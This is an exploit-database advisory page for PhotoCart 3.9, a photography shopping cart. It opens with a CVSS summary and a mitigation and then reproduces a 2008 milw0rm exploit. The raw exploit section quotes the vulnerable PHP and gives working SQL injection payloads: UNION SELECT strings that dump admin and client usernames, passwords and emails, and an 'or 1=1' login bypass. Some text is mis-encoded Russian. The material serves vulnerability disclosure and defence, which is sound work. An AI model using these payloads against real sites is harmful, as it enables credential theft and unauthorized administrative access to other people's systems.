Authentication Bypass SQL Injection

vendor:

PhotoCart

by:

~!Dok_tOR!~

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: PhotoCart

Affected Version From: 3.9

Affected Version To: 3.9

Patch Exists: YES

Related CWE: N/A

CPE: a:picturespro:photocart

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Authentication Bypass SQL Injection

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'email' and 'password' parameters to '/_login.php' script. A remote attacker can send a specially crafted request with malicious SQL statements to the vulnerable script and bypass authentication, gain access to the application with administrative privileges and execute arbitrary SQL commands in the context of the application.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All input data should be validated and filtered before passing to the SQL statement.

Source

Exploit-DB raw data:

Author: ~!Dok_tOR!~
Date found: 18.08.08
Product: PhotoCart
Version: 3.9 Ð²Ð¾Ð·Ð¼Ð¾Ð¶Ð½Ð¾ Ð¸ Ð±Ð¾Ð»ÐµÐµ Ñ€Ð°Ð½Ð½Ð¸Ðµ Ð²ÐµÑ€ÑÐ¸Ð¸
Type: Photography Shopping Cart
URL: www.picturespro.com
Vulnerability Class: SQL Injection

/[installdir]/search.php

Vuln code:

PHP:
if($_REQUEST['searchby'] == "qtitle") {
$gal_where['where'] = "WHERE gal_status='1' AND gal_client!='1 '$and_expire AND gal_title LIKE '%".$_REQUEST['qtitle']."%' ";
print "Results for Gallery or event name: ".$_REQUEST['qtitle']." ";
}
if($_REQUEST['searchby'] == "qid") {
$gal_where['where'] = "WHERE gal_status='1' AND gal_client!='1 '$and_expire AND gal_id='".$_REQUEST['qid']."' ";
print "Results for Gallery or event ID: ".$_REQUEST['qid']." ";
}
if($_REQUEST['searchby'] == "qdate") {
$gdate = "".$_REQUEST['qyear']."-".$_REQUEST['qmonth']."-".$_REQUEST['qday']."";
$gal_where['where'] = "WHERE gal_status='1' AND gal_client!='1 '$and_expire AND gal_date='$gdate' ";
print "Results for Gallery or event date: ".$_REQUEST['qmonth']."-".$_REQUEST['qday']."-".$_REQUEST['qyear']." ";
}


magic_quotes_gpc = Off

Example:
http://[server]/[installdir]/search.php

Ð’Ð²Ð¾Ð´Ð¸Ð¼ Ð² Ð¿Ð¾Ð»Ðµ Gallery or event name:

Exploit 1:

' union select 1,2,3,4,5,concat_ws(0x3a,admin_user,admin_pass),7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26 from admin/*



Exploit 2:

' union select 1,2,3,4,5,concat_ws(0x3a,client_name,client_pass,c lient_email),7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26 from pc_clients/*



Authentication Bypass SQL Injection

/[installdir]/_login.php

Vuln code:

PHP:
$result = @mysql_query("SELECT * FROM pc_clients WHERE client_email='".$_REQUEST['email']."' AND client_pass='".$_REQUEST['password']."'");


Email Address: 1' or 1=1/*
Password: 1' or 1=1/*

# milw0rm.com [2008-08-21]